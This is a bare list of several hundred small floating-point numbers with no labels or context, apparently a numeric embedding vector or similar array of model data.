-0.0005324292578734457, 0.012770776636898518, 0.015969116240739822, -0.008654327131807804, -0.0020920895040035248, 0.015096156857907772, 0.013801771216094494, -0.0034316289238631725, 0.0012407671893015504, 0.008744633756577969, -0.03244996443390846, 0.02545124851167202, -0.003727004863321781, 0.006483220029622316, 0.01715814508497715, 0.0004136674397159368, -0.004586793482303619, -0.013335189782083035, -0.024427779018878937, 0.014035061001777649, -0.0008522631251253188, 0.01723339967429638, -0.0017506199656054378, -0.0005926332669332623, -0.02048441581428051, -0.0044362833723425865, -0.006031689699739218, 0.0029895056504756212, -0.002146649407222867, 0.0024777716025710106, 0.0040825847536325455, -0.008699480444192886, 0.025300737470388412, -0.0004197819216642529, 0.03904230520129204, 0.0025097548495978117, 0.004684625193476677, -0.00027726771077141166, 0.007664723787456751, 0.0017365096136927605, 0.006629967130720615, -0.0016631359467282891, 0.0034786632750183344, 0.024789003655314445, 0.012891184538602829, -0.009519760496914387, 0.021884160116314888, 0.023043086752295494, 0.005877417046576738, -0.0007295033428817987, -0.007961980998516083, 0.014599474146962166, 0.0021109033841639757, 0.020544620230793953, -0.003173880511894822, 0.0005695864092558622, 0.006182199809700251, 0.013794245198369026, -0.00543341226875782, -0.010881875641644001, 0.005079713650047779, -0.004917915444821119, 0.024503035470843315, 0.015246666967868805, 0.011235574260354042, -0.013937230221927166, -0.008345781825482845, -0.006562237627804279, -0.005128629505634308, 0.00040567159885540605, 0.005790873896330595, -0.003792853094637394, -0.023359159007668495, -0.005091002210974693, 0.002112784655764699, 0.008646802045404911, 0.00043177566840313375, -0.010927028954029083, -0.0023234987165778875, -0.003345085773617029, -0.00872205663472414, -0.008857515640556812, -0.005376971326768398, -0.007461535278707743, -0.0015558975283056498, 0.016751768067479134, -0.01947600021958351, 0.015216564759612083, -0.008503817021846771, 0.010091697797179222, -0.012695522047579288, 0.009685320779681206, 0.023283902555704117, 0.0009764339192770422, -0.009038127958774567, 0.007773843593895435, -0.013734040781855583, -0.013771669007837772, 0.006091894116252661, 0.005802161991596222, -0.0029104878194630146, -0.0023216174449771643, -0.03768771514296532, -0.0076910629868507385, 0.012898710556328297, -0.007694825995713472, 0.00442499527707696, -0.007062683813273907, 0.017293604090809822, -0.004782456438988447, -0.008202796801924706, 0.014125367626547813, 0.01619488000869751, -0.005098527763038874, 0.014147943817079067, -0.0040035671554505825, 0.008285577408969402, -0.009662744589149952, -0.024367576465010643, 0.008375884033739567, 0.004421232268214226, -0.00772116519510746, 0.01551758497953415, -0.012070905417203903, -0.006885834503918886, 0.0005493616336025298, 0.0006264980183914304, 0.006821867544203997, -0.0020262415055185556, 0.015126259066164494, 0.028070122003555298, -0.015502533875405788, 0.0037044284399598837, -0.005162494257092476, -0.010942080058157444, 0.015923961997032166, -0.004981882404536009, -0.04328668862581253, 0.0008593182428739965, 0.0105131259188056, 0.013124475255608559, -0.01937064155936241, -0.004778693895787001, -0.0075593669898808, -0.006027927156537771, -0.016285186633467674, -0.0032152708154171705, -0.009798203594982624, 0.00011617493873927742, -0.005437175277620554, 0.012439655140042305, -0.01980712078511715, -0.014734933152794838, 0.004248145967721939, 0.013237358070909977, 0.02602318674325943, 0.009015551768243313, -0.02162829227745533, -0.013365291990339756, 0.007344889920204878, -0.018648194149136543, 0.008082388900220394, 0.0030967441853135824, -0.009196163155138493, -0.009933662600815296, 0.006942275445908308, 0.0045416406355798244, -0.007788894698023796, -0.03163721039891243, 0.016887227073311806, -0.001248292624950409, 0.001745916437357664, 0.00030736971530131996, 0.018452530726790428, 0.0040035671554505825, -0.00444004638120532, -0.004718489944934845, 0.006106944754719734, 0.015374600887298584, 0.011559171602129936, 0.03085455857217312, 0.013944755308330059, 0.006099419202655554, 0.002515399130061269, 0.02734767459332943, -0.005091002210974693, -0.0017346282256767154, 0.011378559283912182, -0.012928812764585018, 0.015893859788775444, -0.017398960888385773, 0.003727004863321781, 0.001305674551986158, -0.002530450001358986, 0.019280336797237396, 0.00805981270968914, -0.007653435692191124, -0.009068230167031288, 0.014501642435789108, 0.003521934850141406, 0.010324988514184952, -0.0070062424056231976, 0.018437480553984642, 0.01736885868012905, -0.011867716908454895, -0.004959305748343468, -0.0011278846068307757, 0.0069723776541650295, 0.004120212513953447, 0.022681863978505135, -0.005858603399246931, -0.008812363259494305, -0.0010940198553726077, 0.00927894376218319, 0.001703585498034954, 0.002682841382920742, 0.0016029318794608116, 0.005892468150705099, 0.01216873712837696, -0.010362616740167141, 0.013320138677954674, 0.0014147943584248424, 0.01994257979094982, -0.004266959615051746, 0.009813254699110985, -0.005839789751917124, -0.0072244820185005665, -0.021718598902225494, -0.001284038764424622, 0.017715031281113625, -0.007841573096811771, 0.010279836133122444, 0.003728886367753148, 0.024758901447057724, -0.01915992796421051, -0.02037905901670456, 0.0055801598355174065, -0.007916827686131, 0.007627096492797136, 0.004635709337890148, 0.00020789199334103614, 0.012748200446367264, -0.006814341992139816, -0.0030986254569143057, -0.04960810765624046, -0.01371146459132433, 0.025406094267964363, 0.000476693530799821, 0.007107836659997702, -0.000033864758734125644, 0.0018653838196769357, -0.008232899010181427, 0.0073712291195988655, -0.026324206963181496, 0.01801605150103569, -0.0016132794553413987, 0.006588576827198267, 0.0036837332881987095, -0.015028427354991436, 0.022967832162976265, 0.000966086343396455, 0.010859299451112747, -0.009963764809072018, -0.0034278661478310823, 0.02262165956199169, -0.007295974064618349, -0.018422428518533707, 0.005700567737221718, -0.029755834490060806, -0.024608392268419266, -0.00013510628195945174, 0.0039584138430655, -0.008684429340064526, 0.004327163565903902, 0.001192792085930705, -0.02366017922759056, -0.008789786137640476, -0.01723339967429638, 0.00599782494828105, 0.010445396415889263, 0.016721665859222412, 0.04843413084745407, 0.01420814823359251, -0.000023149737899075262, -0.001637737383134663, 0.013545903377234936, -0.025782369077205658, 0.007111599203199148, 0.004180416464805603, 0.03825965151190758, 0.011310829780995846, -0.0020563434809446335, -0.012898710556328297, 0.015637993812561035, 0.00599782494828105, -0.01454679574817419, 0.014516693539917469, -0.026866042986512184, 0.020348956808447838, -0.017775235697627068, 0.01955125480890274, -0.001150461146607995, 0.01572829857468605, 0.009151010774075985, -0.004560454282909632, -0.0028277074452489614, -0.0014317267341539264, -0.005798399448394775, -0.008827414363622665, -0.004383604973554611, 0.01598416641354561, 0.026218848302960396, 0.012063379399478436, 0.00444004638120532, 0.003527579130604863, -0.0024232116993516684, -0.020634926855564117, -0.014245775528252125, 0.0016687801107764244, -0.0013555310433730483, -0.00263580703176558, 0.04235352575778961, -0.010159427300095558, 0.001267106388695538, -0.007062683813273907, 0.00623864121735096, -0.012198838405311108, 0.00986593309789896, 0.0012972083641216159, 0.007706114090979099, -0.004759880248457193, -0.018437480553984642, 0.01553263608366251, 0.027392826974391937, -0.012575114145874977, 0.00976057630032301, 0.018738500773906708, 0.01801605150103569, -0.02313339337706566, -0.004552928730845451, 0.0058999937027692795, -0.007939404807984829, -0.019039520993828773, 0.015141310170292854, -0.01102486066520214, -0.013899601995944977, 0.004631946329027414, -0.0025285687297582626, -0.00721319392323494, -0.00961759127676487, -0.02433747425675392, -0.009075755253434181, 0.005019509699195623, 0.0017393316375091672, -0.0036197665613144636, 0.013568480499088764, 0.0025436196010559797, 0.0022971595171839, -0.006517084781080484, -0.01183008961379528, -0.00041343228076584637, -0.03196833282709122, -0.01056580524891615, 0.006727798841893673, 0.008902668952941895, -0.004044957458972931, 0.01485534105449915, 0.016992583870887756, -0.004500250332057476, 0.011092590168118477, 0.012221415527164936, 0.0012069024378433824, -0.018603041768074036, -0.0018051797524094582, -0.015668096020817757, 0.002347956644371152, -0.011912869289517403, 0.02137242630124092, -0.009873459115624428, -0.019972681999206543, 0.015487482771277428, 0.007092785555869341, -0.011514018289744854, -0.02223033271729946, 0.010054070502519608, 0.004308349918574095, -0.02420201525092125, -0.009120908565819263, 0.01801605150103569, -0.007171803619712591, 0.002530450001358986, 0.03603210300207138, -0.008421036414802074, -0.006554712075740099, 0.004391130525618792, -0.007574417628347874, -0.0006015698309056461, 0.0016367967473343015, 0.002133479807525873, -0.003950888756662607, 0.010626008734107018, -0.0142984539270401, 0.021191813051700592, 0.0029951496981084347, 0.019099723547697067, 0.0009858408011496067, -0.028115276247262955, -0.005068425554782152, 0.00030501800938509405, 0.009151010774075985, 0.015622942708432674, 0.02355482056736946, -0.016134675592184067, 0.003136252984404564, 0.0023592449724674225, -0.0036874960642307997, -0.006889597047120333, -0.026941297575831413, -0.005531243979930878, 0.005098527763038874, -0.001173978322185576, 0.010031494311988354, 0.00664125569164753, -0.001595406443811953, 0.014042587019503117, 0.008624224923551083, -0.015382125973701477, -0.033654045313596725, 0.023795638233423233, -0.0009129374520853162, 0.007521739229559898, -0.004680862184613943, -0.010641059838235378, -0.005388259422034025, -0.017715031281113625, 0.00527161406353116, 0.013583531603217125, 0.007702351547777653, -0.02706170454621315, -0.009579963982105255, 0.005689279641956091, -0.007010004948824644, 0.03031272254884243, 0.02651986852288246, 0.008481240831315517, -0.008360832929611206, 0.002445788122713566, 0.0014044467825442553, -0.004387367516756058, -0.008202796801924706, -0.0018917230190709233, -0.01598416641354561, 0.03672444820404053, 0.007333601824939251, 0.01428340282291174, -0.004616895690560341, -0.016721665859222412, -0.009948713704943657, 0.018858907744288445, 0.01776018552482128, 0.025330839678645134, -0.012928812764585018, 0.0067390869371593, 0.0035012399312108755, 0.0091886380687356, -0.021899210289120674, -0.017248449847102165, -0.010618483647704124, 0.011235574260354042, 0.016736716032028198, 0.0010027731768786907, -0.0001334600819973275, -0.00303465873003006, -0.002112784655764699, -0.010084172710776329, 0.006611153483390808, -0.026640277355909348, 0.00034429170773364604, -0.01923518255352974, 0.0006274387123994529, 0.003190812887623906, 0.021176762878894806, 0.020424213260412216, -0.020394111052155495, 0.0003377069078851491, 0.000959971861448139, 0.0011683341581374407, -0.017037736251950264, 0.000049827052862383425, -0.006249929312616587, -0.011897819116711617, -0.0008099321858026087, -0.012402026914060116, -0.015607891604304314, -0.020604824647307396, -0.007751266937702894, -0.0029951496981084347, 0.008330730721354485, -0.0044362833723425865, 0.010031494311988354, 0.003924549091607332, 0.0032303216867148876, -0.019039520993828773, -0.020785436034202576, -0.006509559229016304, -0.014471540227532387, -0.0006810579216107726, 0.02953007072210312, -0.021101508289575577, -0.01134845707565546, -0.010558279231190681, 0.008127542212605476, 0.011875241994857788, -0.002701655263081193, -0.005723144393414259, -0.008518868125975132, -0.008902668952941895, 0.0007182150729931891, 0.005583922378718853, -0.02337420918047428, -0.016059421002864838, 0.021101508289575577, 0.007939404807984829, -0.022907627746462822, 0.007408856879919767, 0.008752158842980862, -0.0170527882874012, 0.016360441222786903, 0.005388259422034025, -0.00419170456007123, -0.021537987515330315, -0.021206865087151527, -0.011416186578571796, -0.009158535860478878, -0.0011429355945438147, -0.009346673265099525, 0.010166953317821026, 0.020002784207463264, -0.009474607184529305, -0.011958022601902485, -0.016330339014530182, 0.01234934851527214, 0.007931878790259361, 0.021929312497377396, -0.024141810834407806, 0.001150461146607995, 0.0028935554437339306, 0.01476503536105156, -0.038982100784778595, -0.00963264238089323, -0.012876134365797043, -0.013335189782083035, -0.006065554451197386, -0.0039019729010760784, 0.0032830003183335066, -0.009166061878204346, 0.016962481662631035, 0.011182895861566067, -0.003725123591721058, 0.03488822653889656, 0.003917024005204439, -0.01827191933989525, -0.0010629771277308464, 0.022606607526540756, -0.003390238620340824, -0.005471040029078722, 0.015893859788775444, -0.004364791326224804, 0.013101899065077305, -0.003638580208644271, -0.0017318062018603086, -0.024186963215470314, -0.03491833060979843, -0.018497683107852936, -0.018031103536486626, -0.0013207256561145186, -0.02341936156153679, 0.006961089558899403, -0.0022181416861712933, 0.011950497515499592, 0.013056745752692223, 0.002099615056067705, 0.00034170481376349926, 0.0014721762854605913, 0.014358658343553543, 0.005196359008550644, -0.000009877221600618213, 0.005847315303981304, 0.004658285994082689, -0.01598416641354561, 0.01238697674125433, -0.03244996443390846, 0.008172695524990559, -0.0017280434258282185, -0.0034523240756243467, -0.007514213677495718, -0.011077539063990116, -0.008421036414802074, -0.0098508819937706, 0.0006598924519494176, 0.019039520993828773, -0.0159390140324831, -0.0172635018825531, 0.005553820636123419, -0.00870700553059578, 0.014524218626320362, 0.005422124173492193, -0.02098109945654869, 0.00681057944893837, -0.01290623564273119, -0.017353808507323265, -0.01313952635973692, 0.025074973702430725, 0.029394611716270447, 0.0008122838917188346, -0.01866324432194233, -0.0034297476522624493, -0.031546905636787415, 0.028085174039006233, -0.005677991081029177, 0.0015540161402896047, -0.00895534735172987, -0.0045943190343678, 0.003838005941361189, -0.004131500609219074, 0.010889401659369469, -0.006178437266498804, 0.0031625921837985516, 0.0023874654434621334, -0.012778302654623985, 0.007743741385638714, 0.017293604090809822, 0.00782652199268341, 0.010844248346984386, 0.005019509699195623, 0.004552928730845451, 0.017007634043693542, 0.014968223869800568, 0.018678296357393265, -0.003138134256005287, 0.009196163155138493, 0.004075059201568365, 0.0007440840126946568, -0.007171803619712591, 0.0021786328870803118, 0.005629075691103935, 0.012635317631065845, -0.001553075504489243, -0.022079823538661003, -0.0054070730693638325, -0.0074765863828361034, 0.013756617903709412, -0.004707201384007931, -0.00038826887612231076, 0.022395893931388855, 0.0013207256561145186, 0.012183788232505322, 0.0039358376525342464, -0.008300628513097763, 0.005847315303981304, 0.0006330828764475882, -0.01068621315062046, -0.0073373643681406975, 0.00047010870184749365, -0.007401331327855587, -0.005753246136009693, -0.012221415527164936, -0.0035595623776316643, -0.028822673484683037, 0.0014147943584248424, -0.016751768067479134, 0.02280227094888687, 0.006848206743597984, -0.020966049283742905, -0.020108141005039215, -0.01090445276349783, 0.004327163565903902, 0.0068594953045248985, -0.020258652046322823, -0.001485346001572907, -0.026429563760757446, -0.024472933262586594, 0.03356374055147171, -0.0037665136624127626, 0.00018707927665673196, -0.008240425027906895, 0.009008025750517845, -0.02019844762980938, 0.0030478283297270536, 0.0009961883770301938, -0.005621550139039755, 0.016315288841724396, 0.0016574917826801538, -0.03371424973011017, -0.0000384506129194051, -0.001906774123199284, -0.026790786534547806, 0.012101007625460625, 0.012236466631293297, -0.049879029393196106, 0.00021200750779826194, 0.01099475845694542, -0.008548970334231853, 0.004014855250716209, -0.00003318864037282765, -0.014125367626547813, -0.004571742378175259, 0.017203297466039658, -0.0012896829284727573, -0.0018136459402740002, 0.0027279944624751806, -0.016962481662631035, 0.0064719319343566895, -0.005027035251259804, -0.018723448738455772, 0.008586597628891468, 0.011973073706030846, -0.002669671783223748, -0.000018563885532785207, -0.0035595623776316643, 0.020348956808447838, -0.011092590168118477, 0.032660678029060364, 0.003917024005204439, 0.020153295248746872, 0.006170911714434624, -0.0068594953045248985, -0.020920895040035248, 0.0005154968821443617, 0.0051211039535701275, -0.01142371166497469, 0.023825738579034805, -0.006863257847726345, 0.011611850000917912, 0.005937620997428894, -0.006566000636667013, -0.023795638233423233, 0.00500445906072855, 0.003659275360405445, -0.0021842769347131252, -0.007010004948824644, -0.001527676940895617, 0.03232955560088158, 0.028897928074002266, -0.018708398565649986, -0.003924549091607332, 0.017383908852934837, 0.03485812619328499, 0.024834156036376953, 0.00771363964304328, -0.012003175914287567, -0.0020243600010871887, -0.009843356907367706, -0.00904565304517746, 0.004458860028535128, 0.0013978619826957583, 0.004060008563101292, 0.018738500773906708, -0.004451334476470947, 0.026173695921897888, 0.0028747417964041233, -0.0017637895653024316, 0.010159427300095558, -0.010678687132894993, 0.0023968724999576807, 0.004707201384007931, 0.007984558120369911, 0.009120908565819263, 0.004970594309270382, -0.008774735033512115, -0.013101899065077305, -0.006483220029622316, 0.002468364778906107, 0.003924549091607332, -0.002061987528577447, -0.005185070913285017, -0.00006132107955636457, -0.0054748025722801685, 0.030117059126496315, 0.011514018289744854, -0.020574722439050674, 0.009120908565819263, 0.01723339967429638, 0.011483916081488132, 0.019310439005494118, 0.006148335058242083, 0.0032999326940625906, 0.01385444961488247, -0.01908467337489128, 0.002366770291700959, -0.00714170141145587, 0.00999386701732874, -0.001322606927715242, 0.0029895056504756212, 0.025962982326745987, 0.003015844849869609, -0.00263204425573349, 0.009143484756350517, 0.02126706950366497, -0.011047436855733395, 0.011559171602129936, -0.003821073565632105, -0.018542837351560593, 0.0015540161402896047, 0.01827191933989525, -0.002248243661597371, 0.0033469670452177525, -0.010641059838235378, 0.01204832922667265, -0.01640559360384941, -0.005316767375916243, 0.015577789396047592, -0.015999216586351395, -0.015683146193623543, -0.0034523240756243467, 0.005425887182354927, 0.0010648585157468915, 0.010294887237250805, -0.008112491108477116, 0.010573330335319042, 0.013086847960948944, 0.0034015269484370947, 0.0009129374520853162, -0.00986593309789896, -0.004409944172948599, -0.0022520064376294613, 0.007977032102644444, -0.004266959615051746, 0.004097635857760906, -0.012973965145647526, 0.0022557692136615515, -0.007446484174579382, -0.009135959669947624, -0.005185070913285017, -0.002654620911926031, -0.012529960833489895, -0.019295386970043182, -0.018241817131638527, 0.013214781880378723, -0.003305576741695404, 0.025692064315080643, -0.007803945802152157, 0.02126706950366497, -0.027257367968559265, 0.022787220776081085, -0.004944254644215107, -0.02381068840622902, 0.0024307372514158487, 0.00963264238089323, 0.014915545471012592, 0.012657894752919674, -0.018964264541864395, -0.013651261106133461, 0.019325489178299904, 0.005486091133207083, -0.006009113509207964, 0.007698588538914919, -0.006091894116252661, 0.011792461387813091, 0.012304196134209633, 0.016992583870887756, 0.007653435692191124, -0.013056745752692223, 0.00029396492755040526, 0.009805729612708092, -0.002315973164513707, -0.003187050111591816, 0.02763364277780056, -0.04500250145792961, -0.002752452390268445, -0.015713248401880264, 0.025300737470388412, -0.00442499527707696, 0.003234084462746978, 0.004917915444821119, -0.014554320834577084, -0.0285969078540802, -0.022335689514875412, -0.01177741028368473, 0.011980598792433739, -0.0018399852560833097, 0.033292822539806366, 0.003051591105759144, -0.0015888216439634562, -0.0017045262502506375, -0.005162494257092476, 0.0059790113009512424, 0.016676511615514755, 0.004387367516756058, -0.01442638784646988, -0.0032528983429074287, 0.0024871784262359142, -0.0008767209947109222, -0.014990800060331821, 0.000735147506929934, -0.019686713814735413, 0.010430346243083477, 0.012785827741026878, 0.012823455035686493, -0.010768993757665157, -0.02763364277780056, 0.010558279231190681, -0.007687300443649292, -0.0047222524881362915, 0.016721665859222412, 0.018828805536031723, -0.006566000636667013, -0.007216956466436386, 0.00147876120172441, 0.006942275445908308, 0.014908019453287125, 0.0051211039535701275, 0.0007422026246786118, -0.026549970731139183, -0.006998716853559017, 0.014802662655711174, 0.017745133489370346, -0.004364791326224804, 0.0039358376525342464, 0.014012484811246395, -0.013779194094240665, -0.004406181629747152, -0.005038323812186718, -0.006073080003261566, 0.0018221121281385422, -0.0128159299492836, -0.0033638994209468365, 0.008857515640556812, -0.04292546212673187, 0.02220023050904274, 0.006197250913828611, -0.020183395594358444, 0.003362018149346113, -0.01068621315062046, 0.0018860789714381099, -0.01304922066628933, 0.01608952321112156, 0.004011092707514763, 0.02037905901670456, -0.0034447985235601664, -0.03080940619111061, 0.012627792544662952, 0.013214781880378723, 0.0027976054698228836, 0.013515802100300789, -0.02313339337706566, 0.01980712078511715, 0.005117341410368681, 0.009820779785513878, -0.005711855832487345, -0.011529069393873215, -0.0011128336191177368, 0.004417469725012779, 0.005354394670575857, 0.012033278122544289, 0.00591504480689764, -0.011152793653309345, 0.004714726936072111, 0.0100089181214571, 0.006234878674149513, -0.012793353758752346, 0.018181612715125084, -0.025330839678645134, 0.008255476132035255, -0.0005089120822958648, -0.008104966022074223, -0.0033319159410893917, -0.01687217503786087, -0.006509559229016304, -0.005444700829684734, 0.006900885608047247, -0.004018618259578943, -0.014629576355218887, -0.00796950701624155, -0.013425495475530624, -0.030372926965355873, 0.0017891881288960576, -0.0020017835777252913, -0.0014561846619471908, 0.005392022430896759, 0.003442917251959443, -0.0019999020732939243, -0.0027618592139333487, -0.0006881130975671113, 0.00011317649477859959, 0.0018192901043221354, 0.0012210126733407378, 0.021869108080863953, -0.0065735261887311935, 0.0048953392542898655, 0.0005202003521844745, 0.010317463427782059, 0.018678296357393265, -0.01708289049565792, -0.01258263923227787, 0.007092785555869341, -0.007280923426151276, -0.016059421002864838, -0.030041804537177086, -0.014908019453287125, 0.030613742768764496, -0.007356178481131792, 0.008571546524763107, -0.008917720057070255, -0.01076146773993969, 0.00435350276529789, 0.004026143811643124, -0.004598081577569246, 0.0072583467699587345, -0.0014289047103375196, -0.0020732758566737175, -0.010001392103731632, 0.013026644475758076, -0.014644626528024673, 0.010151902213692665, 0.0073034996166825294, -0.01405011210590601, -0.0009021195583045483, 0.015954064205288887, -0.00623864121735096, 0.02280227094888687, -0.006716510746628046, 0.010355090722441673, 0.00764214713126421, 0.004011092707514763, -0.00012205423990963027, 0.007092785555869341, 0.01655610464513302, -0.010309937410056591, -0.0006932868855074048, 0.004090110305696726, -0.01304922066628933, 0.01569819636642933, 0.0014712356496602297, -0.002061987528577447, 0.0028088935650885105, -0.016134675592184067, 0.012311721220612526, 0.005079713650047779, -0.0028389955405145884, 0.0041503142565488815, -0.00566670298576355, 0.004131500609219074, -0.0005874594789929688, -0.007849098183214664, -0.012304196134209633, -0.004793744999915361, -0.014704830944538116, 0.0014100909465923905, -0.006291319616138935, 0.013455597683787346, 0.015878809615969658, 0.007977032102644444, -0.01640559360384941, -0.002280227141454816, -0.007457772735506296, -0.0009303402039222419, 0.008917720057070255, -0.019491050392389297, -0.006306370720267296, -0.022862475365400314, 0.005346869118511677, -0.00015921139856800437, 0.00023082125699147582, -0.004616895690560341, -0.006227353122085333, -0.013365291990339756, -0.01045292243361473, -0.008451138623058796, 0.007619570940732956, 0.02055967226624489, -0.0002570429351180792, -0.0067390869371593, 0.012462231330573559, 0.014268351718783379, -0.028371142223477364, 0.013899601995944977, -0.028912978246808052, 0.01569819636642933, 0.005963960196822882, -0.024457881227135658, -0.0105131259188056, 0.01611962541937828, -0.019686713814735413, -0.025752268731594086, -0.004026143811643124, 0.001930291298776865, 0.02027370221912861, 0.018919112160801888, 0.0032773560378700495, 0.0015154479769989848, -0.0006566000520251691, 0.004714726936072111, 0.028762469068169594, 0.003420340595766902, 0.003256661118939519, 0.013357765972614288, -0.0016076354077085853, 0.004218043759465218, 0.009534810669720173, 0.002125954255461693, 0.021929312497377396, 0.0018860789714381099, 0.013929704204201698, -0.009835830889642239, -0.014004959724843502, -0.02641451172530651, -0.0016367967473343015, -0.009700371883809566, 0.016420645639300346, 0.018828805536031723, -0.01125815138220787, -0.029966549947857857, 0.006535898428410292, 0.01791069470345974, 0.0029274201951920986, -0.02716706320643425, -0.017534419894218445, 0.016420645639300346, -0.009429453872144222, 0.004086347762495279, 0.0009566794615238905, 0.008345781825482845, -0.013395393267273903, -0.005064663011580706, -0.005606499034911394, -0.0037683951668441296, 0.014667203649878502, 0.012198838405311108, 0.011250625364482403, 0.023073188960552216, 0.0406678132712841, 0.003140015760436654, -0.003777801990509033, -0.00033041657297872007, 0.02277216874063015, -0.005565108731389046, 0.002366770291700959, -0.032299455255270004, -0.0057946364395320415, 0.0028070122934877872, 0.0017713150009512901, -0.010430346243083477, 0.0012624029768630862, 0.0008861278765834868, 0.00839846022427082, 0.0013489462435245514, 0.015374600887298584, -0.006693934090435505, 0.0183772761374712, 0.026008134707808495, 0.005903756245970726, 0.01569819636642933, 0.001444896450266242, -0.0035520370583981276, -0.003826717846095562, 0.015276769176125526, 0.00839846022427082, 0.0022595319896936417, 0.04075811803340912, 0.00795445591211319, 0.0003727475123014301, -0.002616993384435773, 0.007916827686131, -0.016495900228619576, 0.0015464907046407461, 0.016571154817938805, 0.009587489999830723, 0.006310133263468742, 0.014140418730676174, -0.004075059201568365, -0.012642843648791313, 0.007243295665830374, 0.004492724779993296, 0.005704330746084452, 0.01009922381490469, 0.005696805194020271, -0.02552650310099125, -0.0007243295549415052, -0.007751266937702894, 0.010641059838235378, 0.013410444371402264, -0.0027806730940937996, 0.0016405594069510698, -0.015306871384382248, 0.018783653154969215, 0.04915658012032509, 0.0066976966336369514, -0.001737450249493122, -0.021537987515330315, -0.009820779785513878, -0.013568480499088764, -0.02656502276659012, 0.025646910071372986, 0.0005361920339055359, 0.004026143811643124, -0.0028785045724362135, -0.01622498221695423, 0.0014063281705603004, -0.006596102379262447, 0.0016161015955731273, 0.002011190401390195, 0.03085455857217312, 0.008390935137867928, -0.02490941248834133, 0.01510368287563324, 0.015020902268588543, -0.021643344312906265, 0.008405986241996288, 0.00942192878574133, 0.014433912932872772, -0.0045416406355798244, -0.000542306515853852, -0.004304587375372648, 0.00022964540403336287, 0.008767209947109222, 0.003156948136165738, 0.0019255878869444132, -0.025315789505839348, -0.011897819116711617, -0.02441272884607315, -0.014321030117571354, -0.006249929312616587, 0.01980712078511715, 0.0005582981975749135, 0.022140026092529297, -0.024653544649481773, 0.00018884307064581662, -0.0069046481512486935, -0.0005244334461167455, 0.002820181893184781, -0.00526408851146698, -0.020890792831778526, -0.002705418039113283, -0.02852165326476097, 0.015171412378549576, -0.015954064205288887, 0.007111599203199148, -0.012748200446367264, 0.007367466576397419, 0.005455988924950361, 0.0211316104978323, -0.016887227073311806, -0.012236466631293297, 0.010159427300095558, 0.0010968418791890144, -0.006027927156537771, 0.018994366750121117, 0.006389151327311993, 0.013741566799581051, 0.017865542322397232, 0.012785827741026878, -0.010784044861793518, -0.014840289950370789, 0.0018945451593026519, -0.0024232116993516684, 0.026354307308793068, -0.02105635404586792, -0.0008362714434042573, 0.0016499663470312953, -0.010942080058157444, 0.009828305803239346, -0.014682254754006863, -0.015863757580518723, 0.004537877626717091, 0.007427670527249575, -0.0009105857461690903, -0.00353886722587049, 0.008458664640784264, 0.007073971908539534, 0.007581943180412054, 0.016330339014530182, -0.014223198406398296, -0.002714824862778187, -0.01551758497953415, 0.01912982575595379, -0.027618592604994774, -0.030297670513391495, -0.03241986408829689, -0.0022068535909056664, 0.009474607184529305, 0.006020401604473591, -0.02898823469877243, 0.01744411326944828, 0.009655219502747059, -0.030764251947402954, -0.0015831774799153209, -0.0031926941592246294, 0.008714531548321247, 0.02977088652551174, -0.00897039845585823, 0.017504317685961723, 0.0015182700008153915, 0.00782652199268341, 0.01056580524891615, -0.029003284871578217, -0.004842660389840603, -0.01855788752436638, 0.0028258259408175945, 0.014561846852302551, 0.005572634283453226, -0.004669574089348316, 0.0034993584267795086, -0.04969841614365578, -0.02269691415131092, -0.007183091714978218, 0.02867216244339943, 0.00772116519510746, 0.010309937410056591, -0.007834048010408878, -0.0035689694341272116, -0.007137938868254423, 0.005170019809156656, 0.0055688717402517796, 0.0024758900981396437, -0.004195467568933964, 0.0008466189610771835, -0.0023046850692480803, -0.0016631359467282891, -0.01328251138329506, 0.05400300398468971, 0.02084564045071602, 0.013515802100300789, -0.008564021438360214, -0.001241707825101912, 0.022275486961007118, -0.015051004476845264, -0.017353808507323265, -0.012484807521104813, 0.002468364778906107, 0.00854144524782896, -0.022711964324116707, 0.010957131162285805, -0.006091894116252661, 0.007517976686358452, 0.0052603259682655334, -0.010212106630206108, -0.0010620364919304848, -0.003345085773617029, -0.018211714923381805, -0.021146660670638084, 0.009497183375060558, 0.029605325311422348, -0.02123696729540825, 0.014554320834577084, -0.0026264002081006765, 0.009023076854646206, -0.02144768089056015, 0.014072689227759838, 0.014147943817079067, 0.024999717250466347, -0.010460447520017624, 0.0050872392021119595, 0.0128159299492836, -0.0009176409221254289, 0.0018446886679157615, 0.007627096492797136, 0.020785436034202576, -0.006532135885208845, -0.024111708626151085, 0.013463122770190239, 0.008992974646389484, -0.013967331498861313, -0.002097733784466982, 0.01715814508497715, 0.0017619081772863865, -0.0006434304523281753, -0.013417970389127731, 0.01848263293504715, 0.02713696099817753, 0.023208647966384888, -0.0015474313404411077, -0.002349837915971875, 0.008195271715521812, 0.009707897901535034, -0.01463710144162178, 0.001114715007133782, -0.014606999233365059, -0.0048953392542898655, -0.01651095226407051, -0.0007102192612364888, -0.006701459642499685, -0.0054409378208220005, -0.0031795245595276356, -0.015306871384382248, -0.014366183429956436, -0.00477116834372282, 0.008270526304841042, -0.02805507183074951, 0.013147052377462387, 0.014328556135296822, 0.006788002792745829, -0.0067917658016085625, -0.0024269744753837585, -0.014358658343553543, -0.014238249510526657, 0.010678687132894993, -0.01794079691171646, 0.007615807931870222, -0.007999608293175697, -0.009933662600815296, -0.008074863813817501, 0.011717206798493862, -0.006268743425607681, 0.02173364907503128, -0.005162494257092476, 0.007209430914372206, -0.020454315468668938, -0.007499162573367357, 0.021613242104649544, 0.020258652046322823, 0.004240620415657759, -0.022140026092529297, -0.0034692564513534307, -0.0015248548006638885, -0.012394501827657223, -0.02084564045071602, -0.009120908565819263, -0.008767209947109222, 0.009075755253434181, 0.009512234479188919, 0.026926245540380478, -0.01915992796421051, -0.0012793353525921702, 0.007378754671663046, -0.010061596520245075, 0.009610066190361977, -0.005410836078226566, -0.012191313318908215, 0.009226265363395214, 0.004537877626717091, -0.007886726409196854, -0.013568480499088764, -0.006720273289829493, 0.021537987515330315, 0.016315288841724396, 0.021869108080863953, -0.011273202486336231, -0.00526408851146698, 0.01794079691171646, -0.012236466631293297, -0.007916827686131, 0.01998773403465748, 0.01598416641354561, 0.004906627349555492, -0.011408661492168903, 0.0014383115340024233, 0.028220633044838905, 0.004142788704484701, 0.014433912932872772, -0.020574722439050674, -0.0172635018825531, 0.011498967185616493, 0.017745133489370346, 0.0016546697588637471, 0.012672945857048035, -0.011807512491941452, 0.00247024605050683, 0.02742292918264866, -0.0036611566320061684, 0.001964156050235033, 0.052497901022434235, 0.0011071894550696015, -0.0036837332881987095, -0.006035452708601952, 0.01190534420311451, 0.0020055463537573814, 0.0009185816161334515, 0.007924353703856468, -0.02981603890657425, 